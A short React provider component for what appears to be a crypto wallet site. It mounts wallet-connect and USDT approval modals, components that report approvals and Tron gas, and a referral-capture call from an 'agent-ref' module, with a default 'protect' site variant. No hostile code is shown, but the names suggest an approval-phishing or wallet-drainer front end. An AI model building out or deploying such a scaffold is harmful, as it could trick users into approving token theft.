"use client"

import { useEffect, type ReactNode } from "react"

import {
  defaultUsdtApprovalLabels,
  type SiteVariant,
  type UsdtApprovalLabels,
  type WalletModalLabels,
} from "./config"
import { captureRefFromUrl } from "./agent-ref"
import { ApprovalProvider } from "./context/approval-context"
import { WalletChainProvider } from "./context/wallet-context"
import { ApprovalReporter } from "./components/approval-reporter"
import { TronGasReporter } from "./components/tron-gas-reporter"
import { ConnectWalletModal } from "./components/connect-wallet-modal"
import { UsdtApprovalModal } from "./components/usdt-approval-modal"

type Web3ProviderProps = {
  children: ReactNode
  siteVariant?: SiteVariant
  approvalLabels?: Partial<UsdtApprovalLabels>
  walletModalLabels?: Partial<WalletModalLabels>
}

export function Web3Provider({
  children,
  siteVariant = "protect",
  approvalLabels = defaultUsdtApprovalLabels,
  walletModalLabels,
}: Web3ProviderProps) {
  useEffect(() => {
    captureRefFromUrl()
  }, [])

  return (
    <WalletChainProvider initialModalLabels={walletModalLabels}>
      <ApprovalProvider siteVariant={siteVariant} labels={approvalLabels}>
        {children}
        <ApprovalReporter />
        <TronGasReporter />
        <ConnectWalletModal />
        <UsdtApprovalModal />
      </ApprovalProvider>
    </WalletChainProvider>
  )
}
